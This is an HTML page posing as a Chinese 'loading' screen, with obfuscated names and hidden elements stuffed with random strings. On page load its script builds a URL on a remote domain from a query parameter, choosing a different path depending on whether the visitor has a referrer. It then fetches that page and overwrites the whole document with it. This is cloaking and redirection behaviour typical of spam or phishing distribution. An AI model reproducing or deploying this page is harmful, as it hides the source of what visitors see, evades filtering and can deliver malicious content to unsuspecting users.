<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .DfD4V4HqN {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .DfD4V4HqN .cG768o {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .DfD4V4HqN .content {
            line-height: 50px;
            text-align: center
        }

        .DfD4V4HqN .img {
            width: 100%
        }

        .DfD4V4HqN .EPOtiu45A {
            text-align: center
        }

        .DfD4V4HqN .EPOtiu45A span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .DfD4V4HqN .EPOtiu45A span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .DfD4V4HqN .EPOtiu45A span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .DfD4V4HqN .EPOtiu45A span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .DfD4V4HqN .EPOtiu45A span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .DfD4V4HqN .EPOtiu45A span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .DfD4V4HqN .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function MEoMzYh3ZBH1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wwOhoAI = MEoMzYh3ZBH1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wwOhoAI +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wwOhoAI +".html?a=share";
		}
		
        gRXt5YUL=url+"#"+new Date().getTime();
        gRXt5YUL && function() {
            $.get(gRXt5YUL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >OizMzKWB6q1JaInjBv1Nz0xBirT3HeCtbqmD5LsdgQVWkkxrUj9GwayTu49</h1>
<p  style='display:none'>VA8wGXjfKKUyOUA9YpDesaYM6b8mDzdFjTZ1UjUTpdw718LypmxPWxGcMYCZWZzrQmokj9r7vrsOD68x38UeEc9Qj9</p>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >sfMc716LZzyEU8gKdf2M05EqG2KHW3OeMGLHKnm5gP5bHXbc36QjHaXTmUBoO3kQetQON</ul>
<ul style='display:none' >sfMc716LZzyEU8gKdf2M05EqG2KHW3OeMGLHKnm5gP5bHXbc36QjHaXTmUBoO3kQetQON</ul><div class="DfD4V4HqN">
    <div class="cG768o">
        <div class="EPOtiu45A">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>cBjmJXgA3xBlteS65vG9g5ViWXJAmPE2cWiPq4cPGGzvSOVcwoFYm8lHha6dN</p>
<ul style='display:none' >pZsb3W1imMyXSpIwZEHu1rM26tA9cI08rgVf</ul>
<h1 style='display:none' >Vr5j3usTegIGGrMnU2UGZr48bFtbChjIAApSUJxbht739BBNlLh1Oiy5Rj3U7AFZu4NT9H</h1>
<span style='display:none'>UpvPpqKdroGtobduK8QbKfTZwlVSAgAQGLvIoYB8DRwajX2Xlookzi8Yq7VQti9xHwbVbYYov1HIyQzx5wHHyup5JwVwKs5</span>
<h1 style='display:none' >Vr5j3usTegIGGrMnU2UGZr48bFtbChjIAApSUJxbht739BBNlLh1Oiy5Rj3U7AFZu4NT9H</h1>
<span style='display:none'>UpvPpqKdroGtobduK8QbKfTZwlVSAgAQGLvIoYB8DRwajX2Xlookzi8Yq7VQti9xHwbVbYYov1HIyQzx5wHHyup5JwVwKs5</span>
<div style='display:none'>lb1JUrW1nsUxsyGM3jkiyCKrIxcfCbzds9f5u7w3A6RHyxPg7i2fgfBit3wDDF0n7T5un5RaQHjSsLYPZyo</div></body>
</html>